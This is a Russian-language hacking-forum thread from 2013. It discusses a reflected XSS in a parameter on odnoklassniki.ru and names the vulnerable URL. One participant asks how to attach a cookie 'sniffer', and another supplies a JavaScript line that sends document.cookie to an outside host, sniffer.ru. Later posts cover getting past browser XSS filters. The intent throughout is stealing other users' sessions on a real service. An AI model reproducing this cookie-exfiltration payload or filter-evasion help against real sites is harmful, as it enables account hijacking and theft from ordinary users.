Форум АНТИЧАТ - Пассивная XSS odnoklassniki.ru

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Пассивная XSS odnoklassniki.ru (https://forum.antichat.xyz/showthread.php?t=368978)

DavidRog

15.01.2013 08:16

Из соседней темы, взял эту пассивку.

Цитата:

Сообщение от _Spamer_

_Spamer_ said:
Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS

Подставляя такое:

или

click me!

вылазит алерт.

Вопрос.. а как снифер сюда прикрутить ?

йож	15.01.2013 12:39

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;

DavidRog

15.01.2013 13:54

Цитата:

Сообщение от йож

йож said:

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;

Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..

OxoTnik

15.01.2013 13:59

Цитата:

Сообщение от DavidRog

DavidRog said:
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..

Ты про обход фильтров что нибудь слышал?

justonline

15.01.2013 13:59

Цитата:

Сообщение от DavidRog

хром и ие фильтруют пассивки

йож	15.01.2013 13:59

какой браузер?

DavidRog

15.01.2013 14:10

Цитата:

Сообщение от йож

йож said:
какой браузер?

пробовал через FF и CHROME.

вот так alert(/xss/) в коде хтмл вроде все ровно, но алерт не вылазит.

пару лет назад все получалось, а щас нет.

подумал просто что есть какой-то вариант не в теги выполнять произвольный код. а например в

Время: 16:52